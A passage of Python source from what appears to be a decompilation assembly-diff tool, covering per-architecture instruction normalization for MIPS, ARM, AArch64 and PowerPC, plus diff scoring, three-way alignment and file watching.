return row + "<ignore>"
def _normalize_data_pool(self, row: str) -> str:
pool_match = re.search(ARM32_LOAD_POOL_PATTERN, row)
return pool_match.group(1) if pool_match else row
def post_process(self, lines: List["Line"]) -> None:
lines_by_line_number = {}
for line in lines:
lines_by_line_number[line.line_num] = line
for line in lines:
if line.data_pool_addr is None:
continue
# Add data symbol and its address to the line.
line_original = lines_by_line_number[line.data_pool_addr].original
value = line_original.split()[1]
addr = "{:x}".format(line.data_pool_addr)
line.original = line.normalized_original + f"={value} ({addr})"
class AsmProcessorAArch64(AsmProcessor):
def __init__(self, config: Config) -> None:
super().__init__(config)
self._adrp_pair_registers: Set[str] = set()
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_adrp_differences(mnemonic, row)
row = self._normalize_bl(mnemonic, row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_address(row)
return row + "<ignore>"
def _normalize_adrp_differences(self, mnemonic: str, row: str) -> str:
"""Identifies ADRP + LDR/ADD pairs that are used to access the GOT and
suppresses any immediate differences.
Whenever an ADRP is seen, the destination register is added to the set of registers
that are part of an ADRP + LDR/ADD pair. Registers are removed from the set as soon
as they are used for an LDR or ADD instruction which completes the pair.
This method is somewhat crude but should manage to detect most such pairs.
"""
row_parts = row.split("\t", 1)
if mnemonic == "adrp":
self._adrp_pair_registers.add(row_parts[1].strip().split(",")[0])
row, _ = split_off_address(row)
return row + "<ignore>"
elif mnemonic == "ldr":
for reg in self._adrp_pair_registers:
# ldr xxx, [reg]
# ldr xxx, [reg, <imm>]
if f", [{reg}" in row_parts[1]:
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
elif mnemonic == "add":
for reg in self._adrp_pair_registers:
# add reg, reg, <imm>
if row_parts[1].startswith(f"{reg}, {reg}, "):
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
return row
@dataclass
class ArchSettings:
name: str
re_int: Pattern[str]
re_comment: Pattern[str]
re_reg: Pattern[str]
re_sprel: Pattern[str]
re_large_imm: Pattern[str]
re_imm: Pattern[str]
re_reloc: Pattern[str]
branch_instructions: Set[str]
instructions_with_address_immediates: Set[str]
forbidden: Set[str] = field(default_factory=lambda: set(string.ascii_letters + "_"))
arch_flags: List[str] = field(default_factory=list)
branch_likely_instructions: Set[str] = field(default_factory=set)
proc: Type[AsmProcessor] = AsmProcessor
big_endian: Optional[bool] = True
delay_slot_instructions: Set[str] = field(default_factory=set)
MIPS_BRANCH_LIKELY_INSTRUCTIONS = {
"beql",
"bnel",
"beqzl",
"bnezl",
"bgezl",
"bgtzl",
"blezl",
"bltzl",
"bc1tl",
"bc1fl",
}
MIPS_BRANCH_INSTRUCTIONS = MIPS_BRANCH_LIKELY_INSTRUCTIONS.union(
{
"b",
"beq",
"bne",
"beqz",
"bnez",
"bgez",
"bgtz",
"blez",
"bltz",
"bc1t",
"bc1f",
}
)
ARM32_PREFIXES = {"b", "bl"}
ARM32_CONDS = {
"",
"eq",
"ne",
"cs",
"cc",
"mi",
"pl",
"vs",
"vc",
"hi",
"ls",
"ge",
"lt",
"gt",
"le",
"al",
}
ARM32_SUFFIXES = {"", ".n", ".w"}
ARM32_BRANCH_INSTRUCTIONS = {
f"{prefix}{cond}{suffix}"
for prefix in ARM32_PREFIXES
for cond in ARM32_CONDS
for suffix in ARM32_SUFFIXES
}
AARCH64_BRANCH_INSTRUCTIONS = {
"b",
"b.eq",
"b.ne",
"b.cs",
"b.hs",
"b.cc",
"b.lo",
"b.mi",
"b.pl",
"b.vs",
"b.vc",
"b.hi",
"b.ls",
"b.ge",
"b.lt",
"b.gt",
"b.le",
"cbz",
"cbnz",
"tbz",
"tbnz",
}
PPC_BRANCH_INSTRUCTIONS = {
"b",
"beq",
"beq+",
"beq-",
"bne",
"bne+",
"bne-",
"blt",
"blt+",
"blt-",
"ble",
"ble+",
"ble-",
"bdnz",
"bdnz+",
"bdnz-",
"bge",
"bge+",
"bge-",
"bgt",
"bgt+",
"bgt-",
}
MIPS_SETTINGS = ArchSettings(
name="mips",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"<.*>"),
re_reg=re.compile(
r"\$?\b(a[0-7]|t[0-9]|s[0-8]|at|v[01]|f[12]?[0-9]|f3[01]|kt?[01]|fp|ra|zero)\b"
),
re_sprel=re.compile(r"(?<=,)([0-9]+|0x[0-9a-f]+)\(sp\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(sp)|%(lo|hi)\([^)]*\)"),
re_reloc=re.compile(r"R_MIPS_"),
arch_flags=["-m", "mips:4300"],
branch_likely_instructions=MIPS_BRANCH_LIKELY_INSTRUCTIONS,
branch_instructions=MIPS_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=MIPS_BRANCH_INSTRUCTIONS.union({"jal", "j"}),
delay_slot_instructions=MIPS_BRANCH_INSTRUCTIONS.union({"j", "jal", "jr", "jalr"}),
proc=AsmProcessorMIPS,
)
MIPSEL_SETTINGS = replace(MIPS_SETTINGS, name="mipsel", big_endian=False)
ARM32_SETTINGS = ArchSettings(
name="arm32",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*>|//.*$)"),
# Includes:
# - General purpose registers: r0..13
# - Frame pointer registers: lr (r14), pc (r15)
# - VFP/NEON registers: s0..31, d0..31, q0..15, fpscr, fpexc, fpsid
# SP should not be in this list.
re_reg=re.compile(
r"\$?\b([rq][0-9]|[rq]1[0-5]|pc|lr|[ds][12]?[0-9]|[ds]3[01]|fp(scr|exc|sid))\b"
),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_reloc=re.compile(r"R_ARM_"),
branch_instructions=ARM32_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=ARM32_BRANCH_INSTRUCTIONS.union({"adr"}),
proc=AsmProcessorARM32,
)
ARMEL_SETTINGS = replace(ARM32_SETTINGS, name="armel", big_endian=False)
AARCH64_SETTINGS = ArchSettings(
name="aarch64",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*>|//.*$)"),
# GPRs and FP registers: X0-X30, W0-W30, [BHSDVQ]0..31
# (FP registers may be followed by data width and number of elements, e.g. V0.4S)
# The zero registers and SP should not be in this list.
re_reg=re.compile(r"\$?\b([bhsdvq]([12]?[0-9]|3[01])(\.\d\d?[bhsdvq])?|[xw][12]?[0-9]|[xw]30)\b"),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_reloc=re.compile(r"R_AARCH64_"),
branch_instructions=AARCH64_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=AARCH64_BRANCH_INSTRUCTIONS.union({"bl", "adrp"}),
proc=AsmProcessorAArch64,
)
PPC_SETTINGS = ArchSettings(
name="ppc",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*>|//.*$)"),
re_reg=re.compile(r"\$?\b([rf][0-9]+)\b"),
re_sprel=re.compile(r"(?<=,)(-?[0-9]+|-?0x[0-9a-f]+)\(r1\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(r1)|[^@]*@(ha|h|lo)"),
re_reloc=re.compile(r"R_PPC_"),
branch_instructions=PPC_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=PPC_BRANCH_INSTRUCTIONS.union({"bl"}),
proc=AsmProcessorPPC,
)
ARCH_SETTINGS = [
MIPS_SETTINGS,
MIPSEL_SETTINGS,
ARM32_SETTINGS,
ARMEL_SETTINGS,
AARCH64_SETTINGS,
PPC_SETTINGS,
]
def hexify_int(row: str, pat: Match[str], arch: ArchSettings) -> str:
full = pat.group(0)
if len(full) <= 1:
# leave one-digit ints alone
return full
start, end = pat.span()
if start and row[start - 1] in arch.forbidden:
return full
if end < len(row) and row[end] in arch.forbidden:
return full
return hex(int(full))
def parse_relocated_line(line: str) -> Tuple[str, str, str]:
for c in ",\t ":
if c in line:
ind2 = line.rindex(c)
break
else:
raise Exception(f"failed to parse relocated line: {line}")
before = line[: ind2 + 1]
after = line[ind2 + 1 :]
ind2 = after.find("(")
if ind2 == -1:
imm, after = after, ""
else:
imm, after = after[:ind2], after[ind2:]
if imm == "0x0":
imm = "0"
return before, imm, after
def pad_mnemonic(line: str) -> str:
if "\t" not in line:
return line
mn, args = line.split("\t", 1)
return f"{mn:<7s} {args}"
@dataclass
class Line:
mnemonic: str
diff_row: str
original: str
normalized_original: str
scorable_line: str
line_num: Optional[int] = None
branch_target: Optional[int] = None
data_pool_addr: Optional[int] = None
source_filename: Optional[str] = None
source_line_num: Optional[int] = None
source_lines: List[str] = field(default_factory=list)
comment: Optional[str] = None
def process(dump: str, config: Config) -> List[Line]:
arch = config.arch
processor = arch.proc(config)
skip_next = False
source_lines = []
source_filename = None
source_line_num = None
i = 0
num_instr = 0
data_refs: Dict[int, Dict[str, List[int]]] = defaultdict(lambda: defaultdict(list))
output: List[Line] = []
stop_after_delay_slot = False
lines = dump.split("\n")
while i < len(lines):
row = lines[i]
i += 1
if not row:
continue
if re.match(r"^[0-9a-f]+ <.*>:$", row):
continue
if row.startswith("DATAREF"):
parts = row.split(" ", 3)
text_offset = int(parts[1])
from_offset = int(parts[2])
from_section = parts[3]
data_refs[text_offset][from_section].append(from_offset)
continue
if config.diff_obj and num_instr >= config.max_function_size_lines:
output.append(
Line(
mnemonic="...",
diff_row="...",
original="...",
normalized_original="...",
scorable_line="...",
)
)
break
if not re.match(r"^\s+[0-9a-f]+:\s+", row):
# This regex is conservative, and assumes the file path does not contain "weird"
# characters like colons, tabs, or angle brackets.
if re.match(
r"^[^ \t<>:][^\t<>:]*:[0-9]+( \(discriminator [0-9]+\))?$", row
):
source_filename, _, tail = row.rpartition(":")
source_line_num = int(tail.partition(" ")[0])
source_lines.append(row)
continue
# If the instructions loads a data pool symbol, extract the address of
# the symbol.
data_pool_addr = None
pool_match = re.search(ARM32_LOAD_POOL_PATTERN, row)
if pool_match:
offset = pool_match.group(3).split(" ")[0][1:]
data_pool_addr = int(offset, 16)
m_comment = re.search(arch.re_comment, row)
comment = m_comment[0] if m_comment else None
row = re.sub(arch.re_comment, "", row)
line_num_str = row.split(":")[0]
row = row.rstrip()
tabs = row.split("\t")
row = "\t".join(tabs[2:])
line_num = eval_line_num(line_num_str.strip())
if line_num in data_refs:
refs = data_refs[line_num]
ref_str = "; ".join(
section_name + "+" + ",".join(hex(off) for off in offs)
for section_name, offs in refs.items()
)
output.append(
Line(
mnemonic="<data-ref>",
diff_row="<data-ref>",
original=ref_str,
normalized_original=ref_str,
scorable_line="<data-ref>",
)
)
if "\t" in row:
row_parts = row.split("\t", 1)
else:
# powerpc-eabi-objdump doesn't use tabs
row_parts = [part.lstrip() for part in row.split(" ", 1)]
mnemonic = row_parts[0].strip()
if mnemonic not in arch.instructions_with_address_immediates:
row = re.sub(arch.re_int, lambda m: hexify_int(row, m, arch), row)
# Let 'original' be 'row' with relocations applied, while we continue
# transforming 'row' into a coarser version that ignores registers and
# immediates.
original = row
while i < len(lines):
reloc_row = lines[i]
if re.search(arch.re_reloc, reloc_row):
original = processor.process_reloc(reloc_row, original)
else:
break
i += 1
normalized_original = processor.normalize(mnemonic, original)
scorable_line = normalized_original
if not config.score_stack_differences:
scorable_line = re.sub(arch.re_sprel, "addr(sp)", scorable_line)
if mnemonic in arch.branch_instructions:
# Replace the final argument with "<target>"
scorable_line = re.sub(r"[^, \t]+$", "<target>", scorable_line)
if skip_next:
skip_next = False
row = "<delay-slot>"
mnemonic = "<delay-slot>"
scorable_line = "<delay-slot>"
if mnemonic in arch.branch_likely_instructions:
skip_next = True
row = re.sub(arch.re_reg, "<reg>", row)
row = re.sub(arch.re_sprel, "addr(sp)", row)
row_with_imm = row
if mnemonic in arch.instructions_with_address_immediates:
row = row.strip()
row, _ = split_off_address(row)
row += "<imm>"
else:
row = normalize_imms(row, arch)
branch_target = None
if mnemonic in arch.branch_instructions:
branch_target = int(row_parts[1].strip().split(",")[-1], 16)
output.append(
Line(
mnemonic=mnemonic,
diff_row=row,
original=original,
normalized_original=normalized_original,
scorable_line=scorable_line,
line_num=line_num,
branch_target=branch_target,
data_pool_addr=data_pool_addr,
source_filename=source_filename,
source_line_num=source_line_num,
source_lines=source_lines,
comment=comment,
)
)
num_instr += 1
source_lines = []
if config.stop_jrra and mnemonic == "jr" and row_parts[1].strip() == "ra":
stop_after_delay_slot = True
elif stop_after_delay_slot:
break
processor.post_process(output)
return output
def normalize_imms(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_imm, "<imm>", row)
def normalize_stack(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_sprel, "addr(sp)", row)
def imm_matches_everything(row: str, arch: ArchSettings) -> bool:
# (this should probably be arch-specific)
return "(." in row
def split_off_address(line: str) -> Tuple[str, str]:
"""Split e.g. 'beqz $r0,1f0' into 'beqz $r0,' and '1f0'."""
parts = line.split(",")
if len(parts) < 2:
parts = line.split(None, 1)
off = len(line) - len(parts[-1])
return line[:off], line[off:]
def diff_sequences_difflib(
seq1: List[str], seq2: List[str]
) -> List[Tuple[str, int, int, int, int]]:
differ = difflib.SequenceMatcher(a=seq1, b=seq2, autojunk=False)
return differ.get_opcodes()
def diff_sequences(
seq1: List[str], seq2: List[str], algorithm: str
) -> List[Tuple[str, int, int, int, int]]:
if (
algorithm != "levenshtein"
or len(seq1) * len(seq2) > 4 * 10 ** 8
or len(seq1) + len(seq2) >= 0x110000
):
return diff_sequences_difflib(seq1, seq2)
# The Levenshtein library assumes that we compare strings, not lists. Convert.
# (Per the check above we know we have fewer than 0x110000 unique elements, so chr() works.)
remapping: Dict[str, str] = {}
def remap(seq: List[str]) -> str:
seq = seq[:]
for i in range(len(seq)):
val = remapping.get(seq[i])
if val is None:
val = chr(len(remapping))
remapping[seq[i]] = val
seq[i] = val
return "".join(seq)
rem1 = remap(seq1)
rem2 = remap(seq2)
import Levenshtein
ret: List[Tuple[str, int, int, int, int]] = Levenshtein.opcodes(rem1, rem2)
return ret
def diff_lines(
lines1: List[Line],
lines2: List[Line],
algorithm: str,
) -> List[Tuple[Optional[Line], Optional[Line]]]:
ret = []
for (tag, i1, i2, j1, j2) in diff_sequences(
[line.mnemonic for line in lines1],
[line.mnemonic for line in lines2],
algorithm,
):
for line1, line2 in itertools.zip_longest(lines1[i1:i2], lines2[j1:j2]):
if tag == "replace":
if line1 is None:
tag = "insert"
elif line2 is None:
tag = "delete"
elif tag == "insert":
assert line1 is None
elif tag == "delete":
assert line2 is None
ret.append((line1, line2))
return ret
def score_diff_lines(
lines: List[Tuple[Optional[Line], Optional[Line]]], config: Config
) -> int:
# This logic is copied from `scorer.py` from the decomp permuter project
# https://github.com/simonlindholm/decomp-permuter/blob/main/src/scorer.py
score = 0
deletions = []
insertions = []
def lo_hi_match(old: str, new: str) -> bool:
# TODO: Make this arch-independent, like `imm_matches_everything()`
old_lo = old.find("%lo")
old_hi = old.find("%hi")
new_lo = new.find("%lo")
new_hi = new.find("%hi")
if old_lo != -1 and new_lo != -1:
old_idx = old_lo
new_idx = new_lo
elif old_hi != -1 and new_hi != -1:
old_idx = old_hi
new_idx = new_hi
else:
return False
if old[:old_idx] != new[:new_idx]:
return False
old_inner = old[old_idx + 4 : -1]
new_inner = new[new_idx + 4 : -1]
return old_inner.startswith(".") or new_inner.startswith(".")
def diff_sameline(old: str, new: str) -> None:
nonlocal score
if old == new:
return
if lo_hi_match(old, new):
return
ignore_last_field = False
if config.score_stack_differences:
oldsp = re.search(config.arch.re_sprel, old)
newsp = re.search(config.arch.re_sprel, new)
if oldsp and newsp:
oldrel = int(oldsp.group(1) or "0", 0)
newrel = int(newsp.group(1) or "0", 0)
score += abs(oldrel - newrel) * config.penalty_stackdiff
ignore_last_field = True
# Probably regalloc difference, or signed vs unsigned
# Compare each field in order
newfields, oldfields = new.split(","), old.split(",")
if ignore_last_field:
newfields = newfields[:-1]
oldfields = oldfields[:-1]
for nf, of in zip(newfields, oldfields):
if nf != of:
score += config.penalty_regalloc
# Penalize any extra fields
score += abs(len(newfields) - len(oldfields)) * config.penalty_regalloc
def diff_insert(line: str) -> None:
# Reordering or totally different codegen.
# Defer this until later when we can tell.
insertions.append(line)
def diff_delete(line: str) -> None:
deletions.append(line)
# Find the end of the last long streak of matching mnemonics, if it looks
# like the objdump output was truncated. This is used to skip scoring
# misaligned lines at the end of the diff.
last_mismatch = -1
max_index = None
lines_were_truncated = False
for index, (line1, line2) in enumerate(lines):
if (line1 and line1.original == "...") or (line2 and line2.original == "..."):
lines_were_truncated = True
if line1 and line2 and line1.mnemonic == line2.mnemonic:
if index - last_mismatch >= 50:
max_index = index
else:
last_mismatch = index
if not lines_were_truncated:
max_index = None
for index, (line1, line2) in enumerate(lines):
if max_index is not None and index > max_index:
break
if line1 and line2 and line1.mnemonic == line2.mnemonic:
diff_sameline(line1.scorable_line, line2.scorable_line)
else:
if line1:
diff_delete(line1.scorable_line)
if line2:
diff_insert(line2.scorable_line)
insertions_co = Counter(insertions)
deletions_co = Counter(deletions)
for item in insertions_co + deletions_co:
ins = insertions_co[item]
dels = deletions_co[item]
common = min(ins, dels)
score += (
(ins - common) * config.penalty_insertion
+ (dels - common) * config.penalty_deletion
+ config.penalty_reordering * common
)
return score
@dataclass(frozen=True)
class OutputLine:
base: Optional[Text] = field(compare=False)
fmt2: Text = field(compare=False)
key2: Optional[str]
boring: bool = field(compare=False)
is_data_ref: bool = field(compare=False)
line1: Optional[Line] = field(compare=False)
line2: Optional[Line] = field(compare=False)
@dataclass(frozen=True)
class Diff:
lines: List[OutputLine]
score: int
max_score: int
def trim_nops(lines: List[Line], arch: ArchSettings) -> List[Line]:
lines = lines[:]
while lines and lines[-1].mnemonic == "nop" and (len(lines) == 1 or lines[-2].mnemonic not in arch.delay_slot_instructions):
lines.pop()
return lines
def do_diff(lines1: List[Line], lines2: List[Line], config: Config) -> Diff:
if config.show_source:
import cxxfilt
arch = config.arch
fmt = config.formatter
output: List[OutputLine] = []
sc1 = symbol_formatter("base-reg", 0)
sc2 = symbol_formatter("my-reg", 0)
sc3 = symbol_formatter("base-stack", 4)
sc4 = symbol_formatter("my-stack", 4)
sc5 = symbol_formatter("base-branch", 0)
sc6 = symbol_formatter("my-branch", 0)
bts1: Set[int] = set()
bts2: Set[int] = set()
if config.show_branches:
for (lines, btset, sc) in [
(lines1, bts1, sc5),
(lines2, bts2, sc6),
]:
for line in lines:
bt = line.branch_target
if bt is not None:
btset.add(bt)
sc(str(bt))
lines1 = trim_nops(lines1, arch)
lines2 = trim_nops(lines2, arch)
diffed_lines = diff_lines(lines1, lines2, config.algorithm)
score = score_diff_lines(diffed_lines, config)
max_score = len(lines1) * config.penalty_deletion
line_num_base = -1
line_num_offset = 0
line_num_2to1 = {}
for (line1, line2) in diffed_lines:
if line1 is not None and line1.line_num is not None:
line_num_base = line1.line_num
line_num_offset = 0
else:
line_num_offset += 1
if line2 is not None and line2.line_num is not None:
line_num_2to1[line2.line_num] = (line_num_base, line_num_offset)
for (line1, line2) in diffed_lines:
line_color1 = line_color2 = sym_color = BasicFormat.NONE
line_prefix = " "
is_data_ref = False
out1 = Text() if not line1 else Text(pad_mnemonic(line1.original))
out2 = Text() if not line2 else Text(pad_mnemonic(line2.original))
if line1 and line2 and line1.diff_row == line2.diff_row:
if line1.diff_row == "<data-ref>":
if line1.normalized_original != line2.normalized_original:
line_prefix = "i"
sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(sym_color)
out2 = out2.reformat(sym_color)
is_data_ref = True
elif (
line1.normalized_original == line2.normalized_original
and line2.branch_target is None
):
# Fast path: no coloring needed. We don't include branch instructions
# in this case because we need to check that their targets line up in
# the diff, and don't just happen to have the are the same address
# by accident.
pass
elif line1.diff_row == "<delay-slot>":
# Don't draw attention to differing branch-likely delay slots: they
# typically mirror the branch destination - 1 so the real difference
# is elsewhere. Still, do mark them as different to avoid confusion.
# No need to consider branches because delay slots can't branch.
out1 = out1.reformat(BasicFormat.DELAY_SLOT)
out2 = out2.reformat(BasicFormat.DELAY_SLOT)
else:
mnemonic = line1.original.split()[0]
branchless1, address1 = out1.plain(), ""
branchless2, address2 = out2.plain(), ""
if mnemonic in arch.instructions_with_address_immediates:
branchless1, address1 = split_off_address(branchless1)
branchless2, address2 = split_off_address(branchless2)
out1 = Text(branchless1)
out2 = Text(branchless2)
out1, out2 = format_fields(
arch.re_imm, out1, out2, lambda _: BasicFormat.IMMEDIATE
)
if line2.branch_target is not None:
target = line2.branch_target
line2_target = line_num_2to1.get(line2.branch_target)
if line2_target is None:
# If the target is outside the disassembly, extrapolate.
# This only matters near the bottom.
assert line2.line_num is not None
line2_line = line_num_2to1[line2.line_num]
line2_target = (line2_line[0] + (target - line2.line_num), 0)
# Set the key for three-way diffing to a normalized version.
norm2, norm_branch2 = split_off_address(line2.normalized_original)
if norm_branch2 != "<ign>":
line2.normalized_original = norm2 + str(line2_target)
same_target = line2_target == (line1.branch_target, 0)
else:
# Do a naive comparison for non-branches (e.g. function calls).
same_target = address1 == address2
if normalize_imms(branchless1, arch) == normalize_imms(
branchless2, arch
):
if imm_matches_everything(branchless2, arch):
# ignore differences due to %lo(.rodata + ...) vs symbol
out1 = out1.reformat(BasicFormat.NONE)
out2 = out2.reformat(BasicFormat.NONE)
elif line2.branch_target is not None and same_target:
# same-target branch, don't color
pass
else:
# must have an imm difference (or else we would have hit the
# fast path)
sym_color = BasicFormat.IMMEDIATE
line_prefix = "i"
else:
out1, out2 = format_fields(arch.re_sprel, out1, out2, sc3, sc4)
if normalize_stack(branchless1, arch) == normalize_stack(
branchless2, arch
):
# only stack differences (luckily stack and imm
# differences can't be combined in MIPS, so we
# don't have to think about that case)
sym_color = BasicFormat.STACK
line_prefix = "s"
else:
# reg differences and maybe imm as well
out1, out2 = format_fields(arch.re_reg, out1, out2, sc1, sc2)
line_color1 = line_color2 = sym_color = BasicFormat.REGISTER
line_prefix = "r"
if same_target:
address_imm_fmt = BasicFormat.NONE
else:
address_imm_fmt = BasicFormat.IMMEDIATE
out1 += Text(address1, address_imm_fmt)
out2 += Text(address2, address_imm_fmt)
elif line1 and line2:
line_prefix = "|"
line_color1 = line_color2 = sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(line_color1)
out2 = out2.reformat(line_color2)
elif line1:
line_prefix = "<"
line_color1 = sym_color = BasicFormat.DIFF_REMOVE
out1 = out1.reformat(line_color1)
out2 = Text()
elif line2:
line_prefix = ">"
line_color2 = sym_color = BasicFormat.DIFF_ADD
out1 = Text()
out2 = out2.reformat(line_color2)
if config.show_source and line2 and line2.comment:
out2 += f" {line2.comment}"
def format_part(
out: Text,
line: Optional[Line],
line_color: Format,
btset: Set[int],
sc: FormatFunction,
) -> Optional[Text]:
if line is None:
return None
if line.line_num is None:
return out
in_arrow = Text(" ")
out_arrow = Text()
if config.show_branches:
if line.line_num in btset:
in_arrow = Text("~>", sc(str(line.line_num)))
if line.branch_target is not None:
out_arrow = " " + Text("~>", sc(str(line.branch_target)))
formatted_line_num = Text(hex(line.line_num)[2:] + ":", line_color)
return formatted_line_num + " " + in_arrow + " " + out + out_arrow
part1 = format_part(out1, line1, line_color1, bts1, sc5)
part2 = format_part(out2, line2, line_color2, bts2, sc6)
if config.show_source and line2:
for source_line in line2.source_lines:
line_format = BasicFormat.SOURCE_OTHER
if config.source_old_binutils:
if source_line and re.fullmatch(".*\.c(?:pp)?:\d+", source_line):
line_format = BasicFormat.SOURCE_FILENAME
elif source_line and source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except:
pass
else:
# File names and function names
if source_line and source_line[0] != "│":
line_format = BasicFormat.SOURCE_FILENAME
# Function names
if source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except:
pass
padding = " " * 7 if config.show_line_numbers else " " * 2
output.append(
OutputLine(
base=None,
fmt2=padding + Text(source_line, line_format),
key2=source_line,
boring=True,
is_data_ref=False,
line1=None,
line2=None,
)
)
key2 = line2.normalized_original if line2 else None
boring = False
if line_prefix == " ":
boring = True
elif config.compress and config.compress.same_instr and line_prefix in "irs":
boring = True
if config.show_line_numbers:
if line2 and line2.source_line_num is not None:
num_color = (
BasicFormat.SOURCE_LINE_NUM
if sym_color == BasicFormat.NONE
else sym_color
)
num2 = Text(f"{line2.source_line_num:5}", num_color)
else:
num2 = Text(" " * 5)
else:
num2 = Text()
fmt2 = Text(line_prefix, sym_color) + num2 + " " + (part2 or Text())
output.append(
OutputLine(
base=part1,
fmt2=fmt2,
key2=key2,
boring=boring,
is_data_ref=is_data_ref,
line1=line1,
line2=line2,
)
)
output = output[config.skip_lines :]
return Diff(lines=output, score=score, max_score=max_score)
def chunk_diff_lines(
diff: List[OutputLine],
) -> List[Union[List[OutputLine], OutputLine]]:
"""Chunk a diff into an alternating list like A B A B ... A, where:
* A is a List[OutputLine] of insertions,
* B is a single non-insertion OutputLine, with .base != None."""
cur_right: List[OutputLine] = []
chunks: List[Union[List[OutputLine], OutputLine]] = []
for output_line in diff:
if output_line.base is not None:
chunks.append(cur_right)
chunks.append(output_line)
cur_right = []
else:
cur_right.append(output_line)
chunks.append(cur_right)
return chunks
def compress_matching(
li: List[Tuple[OutputLine, ...]], context: int
) -> List[Tuple[OutputLine, ...]]:
ret: List[Tuple[OutputLine, ...]] = []
matching_streak: List[Tuple[OutputLine, ...]] = []
context = max(context, 0)
def flush_matching() -> None:
if len(matching_streak) <= 2 * context + 1:
ret.extend(matching_streak)
else:
ret.extend(matching_streak[:context])
skipped = len(matching_streak) - 2 * context
filler = OutputLine(
base=Text(f"<{skipped} lines>", BasicFormat.SOURCE_OTHER),
fmt2=Text(),
key2=None,
boring=False,
is_data_ref=False,
line1=None,
line2=None,
)
columns = len(matching_streak[0])
ret.append(tuple([filler] * columns))
if context > 0:
ret.extend(matching_streak[-context:])
matching_streak.clear()
for line in li:
if line[0].boring:
matching_streak.append(line)
else:
flush_matching()
ret.append(line)
flush_matching()
return ret
def align_diffs(
old_diff: Diff, new_diff: Diff, config: Config
) -> Tuple[TableMetadata, List[Tuple[OutputLine, ...]]]:
meta: TableMetadata
diff_lines: List[Tuple[OutputLine, ...]]
padding = " " * 7 if config.show_line_numbers else " " * 2
if config.threeway:
meta = TableMetadata(
headers=(
Text("TARGET"),
Text(f"{padding}CURRENT ({new_diff.score})"),
Text(f"{padding}PREVIOUS ({old_diff.score})"),
),
current_score=new_diff.score,
max_score=new_diff.max_score,
previous_score=old_diff.score,
)
old_chunks = chunk_diff_lines(old_diff.lines)
new_chunks = chunk_diff_lines(new_diff.lines)
diff_lines = []
empty = OutputLine(Text(), Text(), None, True, False, None, None)
assert len(old_chunks) == len(new_chunks), "same target"
for old_chunk, new_chunk in zip(old_chunks, new_chunks):
if isinstance(old_chunk, list):
assert isinstance(new_chunk, list)
if not old_chunk and not new_chunk:
# Most of the time lines sync up without insertions/deletions,
# and there's no interdiffing to be done.
continue
differ = difflib.SequenceMatcher(
a=old_chunk, b=new_chunk, autojunk=False
)
for (tag, i1, i2, j1, j2) in differ.get_opcodes():
if tag in ["equal", "replace"]:
for i, j in zip(range(i1, i2), range(j1, j2)):
diff_lines.append((empty, new_chunk[j], old_chunk[i]))
if tag in ["insert", "replace"]:
for j in range(j1 + i2 - i1, j2):
diff_lines.append((empty, new_chunk[j], empty))
if tag in ["delete", "replace"]:
for i in range(i1 + j2 - j1, i2):
diff_lines.append((empty, empty, old_chunk[i]))
else:
assert isinstance(new_chunk, OutputLine)
# old_chunk.base and new_chunk.base have the same text since
# both diffs are based on the same target, but they might
# differ in color. Use the new version.
diff_lines.append((new_chunk, new_chunk, old_chunk))
diff_lines = [
(base, new, old if old != new else empty) for base, new, old in diff_lines
]
else:
meta = TableMetadata(
headers=(
Text("TARGET"),
Text(f"{padding}CURRENT ({new_diff.score})"),
),
current_score=new_diff.score,
max_score=new_diff.max_score,
previous_score=None,
)
diff_lines = [(line, line) for line in new_diff.lines]
if config.compress:
diff_lines = compress_matching(diff_lines, config.compress.context)
return meta, diff_lines
def debounced_fs_watch(
targets: List[str],
outq: "queue.Queue[Optional[float]]",
config: Config,
project: ProjectSettings,
) -> None:
import watchdog.events
import watchdog.observers
class WatchEventHandler(watchdog.events.FileSystemEventHandler):
def __init__(
self, queue: "queue.Queue[float]", file_targets: List[str]
) -> None:
self.queue = queue
self.file_targets = file_targets
def on_modified(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileModifiedEvent):
self.changed(ev.src_path)
def on_moved(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileMovedEvent):
self.changed(ev.dest_path)
def should_notify(self, path: str) -> bool:
for target in self.file_targets:
if os.path.normpath(path) == target:
return True
if config.make and any(
path.endswith(suffix) for suffix in project.source_extensions
):
return True
return False
